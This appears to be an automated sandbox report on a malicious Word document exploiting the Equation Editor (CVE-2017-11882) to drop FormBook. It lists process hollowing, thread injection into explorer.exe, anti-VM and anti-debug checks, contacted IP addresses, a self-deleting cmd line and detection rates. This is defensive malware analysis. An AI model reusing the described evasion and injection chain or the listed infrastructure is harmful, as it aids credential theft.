Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041DD78 pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_004175C7 push ss; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00414E16 pushfd ; retf
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CEB5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF6C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF02 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF0B push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00E02050 push es; ret
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_000975C7 push ss; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009DD78 pushfd ; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00094E16 pushfd ; retf
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CEB5 push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF0B push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF02 push eax; ret
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009CF6C push eax; ret

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	Jump to dropped file
Source: C:\Users\Public\69577.exe	File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\Public\69577.exe

File opened: C:\Users\Public\69577.exe\:Zone.Identifier read attributes | delete

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEA

Source: C:\Users\Public\69577.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: Process Memory Space: 69577.exe PID: 1484, type: MEMORY

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\69577.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2492	Thread sleep time: -180000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2712	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\69577.exe TID: 912	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\Public\69577.exe TID: 2948	Thread sleep count: 185 > 30
Source: C:\Users\Public\69577.exe TID: 2352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2980	Thread sleep count: 31 > 30
Source: C:\Windows\explorer.exe TID: 2980	Thread sleep time: -62000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 2412	Thread sleep time: -50000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: explorer.exe, 00000006.00000002.2355507116.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2122292893.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 00000006.00000000.2122292893.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: 69577.exe, 00000004.00000002.2114416536.00000000033D1000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000006.00000002.2355542153.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\69577.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00830080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008300EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E226F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\69577.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug

Source: C:\Users\Public\69577.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 35.208.61.46 80
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.39 80

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\69577.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 1388
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 1388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: C0000

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\Public\69577.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 7EFDE008

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'

Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2355507116.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2355833533.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\Public\69577.exe

Queries volume information: C:\Users\Public\69577.exe VolumeInformation

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Shared Modules1	Valid Accounts1	Valid Accounts1	Disable or Modify Tools1	Credential API Hooking1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Valid Accounts1	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Information Discovery113	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Process Injection812	Obfuscated Files or Information3	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Security Software Discovery221	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rootkit1	LSA Secrets	Virtualization/Sandbox Evasion3	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading121	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion3	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection812	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IMG-11862.doc	39%	Virustotal		Browse
IMG-11862.doc	24%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	100%	Joe Sandbox ML
C:\Users\Public\69577.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	43%	ReversingLabs	ByteCode-MSIL.Trojan.Tnega
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs
C:\Users\Public\69577.exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Tnega

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
